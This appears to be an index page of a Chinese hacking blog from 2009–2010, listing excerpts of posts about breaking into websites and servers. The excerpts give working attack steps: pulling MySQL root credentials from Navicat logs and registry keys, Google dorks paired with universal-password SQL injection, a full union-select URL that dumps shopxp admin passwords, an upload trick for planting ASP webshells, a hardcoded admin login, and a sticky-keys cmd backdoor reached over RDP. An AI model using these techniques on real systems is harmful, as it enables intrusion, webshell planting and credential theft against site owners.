2010年8月8日
views
navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到
有两个方法提权:
1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt
2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下,导出注册表导入到本机然后星号察看就OK了。。
...
2010年5月16日
views
影响版本: YYCMS音乐程序 v4.0 VIP版
漏洞描述:
只是看了一下数据库文件 conn.asp 文件里 数据库地址是 YYCMS_Data/#67tingdata.asa.刚开始以为这个是默认的数据库 后来查看数据库文件发现 数据库是 /YYCMS_Data/#user.asa1,后来发现这个程序竟然和 www.67ting.com 相似~~ 绝对是修改人家程序的~~ 笨到连conn.asp 文件里的数据库地址都没修改 这个网站大家不要去看啊~~网站里边病毒很多 我已经中招了 CPU使用瞬间飘升 100%
...
2010年5月5日
views
"技术支持:首屏科技" or inurl:"/sp_admin/"
万能密码'or'='or'可以直接进入后台
拿shell有数据库备份
把一句话转换,在备份 备份路径在sp_admin/backup/...
我拿了个SHELL看了下,这个程序存在编辑器,不用进后台也可以直接很方便拿SHELL
sp_admin/Html/admin_login.asp admin nhjz99.com 登陆编辑器直接搞定。、
...
2010年4月7日
views
关键字:
inurl:/reg_TemletSel.asp?step=2
或者
电子商务自助建站--您理想的助手
利用方法:
1)注册
2)网站管理---资源管理---上传X.asp;x.jpg
3)拿到webshell
2010年3月31日
views
漏洞版本:shopxp网上购物系统 v7.4
关键词:inurl:shopxp_news.asp
shopxp_news.asp
暴密码的语句:
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
...
2010年3月7日
views
测试方法:
在webshell下运行360test.exe
成功后,3389到服务器,按5下shift,得到一个cmd
PS:由于需要本地权限,对个人用户不会造成影响,危害也不是大范围的。
201003071751447446.rar
2009年10月5日
views
今天一同事扔给我一个站点,快速找出网站漏洞的站点,只要知道对方使用的是什么源码,就可以找到是否有漏洞!感觉不错!特拿上来晒晒!网址:http://www.sebug.net/
我输入动网的时候开始检查是否有漏洞。如图:
...
2009年10月3日
views
在实战中我们常常面临这样的困境:我们感觉到目标网站采用的是一套开放的源码,但是由站长对页面的修改抹杀了能够直接获取这套源码名称的显性标志。这对我 们的破解显然是不利的,我们可能会为了找到源码来研究而疲于到各大下载网站下载类似的源码,一一确定,更有甚于,我们拿到了网站的后台密码,但却找不到后 台路径,并且有时候这个后台还是源码默认的——用字典跑不出来之后,还有什么选择?
现在我向大家推荐另外一种选择:源码目录查询——这是“了结网”(www.seeknot.com)推出的一项服务。其实这个思路大家在平常一定也有过,就是通过网站的特殊文件名确定源码的名称。废话少说,先看一个例子:
...
5Styles 主题由